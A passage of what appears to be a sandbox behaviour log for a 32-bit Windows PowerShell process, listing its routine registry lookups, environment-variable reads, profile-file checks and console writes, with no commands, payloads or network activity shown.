| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
Thread 0x8d4
39
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Unmap | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
|
1 |
Thread 0x534
136
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
19 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PATH |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 62 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 17 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 57 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
